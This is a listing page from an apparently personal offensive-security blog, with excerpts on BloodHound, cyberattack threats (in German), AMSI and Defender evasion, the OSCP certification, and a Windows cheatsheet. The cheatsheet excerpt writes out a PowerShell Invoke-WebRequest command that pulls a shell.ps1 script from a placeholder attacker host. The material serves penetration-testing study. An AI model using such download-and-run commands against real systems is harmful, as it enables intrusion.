======================
== gkourgkoutas.net ==
======================
Rethink Security

BloodHound Part II

security tools windows AD
The first part of my BloodHound post was about the setup and usage of the tool. This part will mainly focous on the built-in queries and some small tips and tricks. I think the only way to fully grasp BloodHound is by frequently using it. Built-in queries After dumping our raw data with SharpHound1, it’s time to get to work. BH has some built-in queries which helps us to get a quick overview of the domain we are facing. Read more...

Cyberangriffe - Bedrohungen - Auswirkungen

security hacking german
“Die Zahl der Angriffe auf IT- und OT-Infrastrukturen hat in den letzten Jahren drastisch zugenommen.” Solche und ähnliche Aussagen finden sich mittlerweile nicht mehr nur auf einschlägigen Nachrichtenseiten im Internet. Das Verständnis darüber, dass Cyberangriffe von Kriminellen keinesfalls Fiktion aus Hollywood sind, dringt langsam aber sicher in das Bewusstsein der Menschen1. Bedrohungen Was sind eigentlich die wesentlichen Bedrohungen denen Unternehmen oder immer häufiger Städte/Kommunen (z.B. Witten2 und Schwerin3) ausgesetzt sind? Meistens verfolgen Kriminelle die Absicht Lösegelder zu erbeuten. Read more...

Antivirus Evasion

security hacking av amsi defender bypass
A lot of organizations and companies run antivirus software on their users clients. Users should be protected from themselves by preventing the execution of .exe files or scripts. Through GPOs and standard tools of the OS, this can be achieved. In this post we’ll be mainly talking about how to bypass tools like AMSI1 and Windows Defender. Antivirus Software The first AV software originated back in 1972. Since the first known Virus was the so called “Creeper Virus”2, Ray Tomlinson used to write the “Reaper”3, a program to remove it. Read more...

Journey to OSCP

oscp security hacking certification
There are tons of writeups on the internet from people who completed their OSCP certification, and I guess most of them are written better than this version. But anyway… Let’s jump in. Lab As soon as you get access to the lab, you will notice a lot of machines and different networks, which you can’t access at first. There is a so called learning path1, which suggests a few easy, medium and hard machines and their respective IP addresses. Read more...

Windows Cheatsheet

security cheats tools windows powershell AD privesc
So this is the windows equivalent of my post about linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team. I also have grepable cheatsheets to download on my GitHub. Powershell Download from remote Webserver PS> Invoke-WebRequest -Uri "http://<ip>:<port>/shell.ps1." -OutFile "C:\path\file" With the following command, Powershell downloads the file and executes it immediately Read more...
Previous Page 3 of 5 Next Page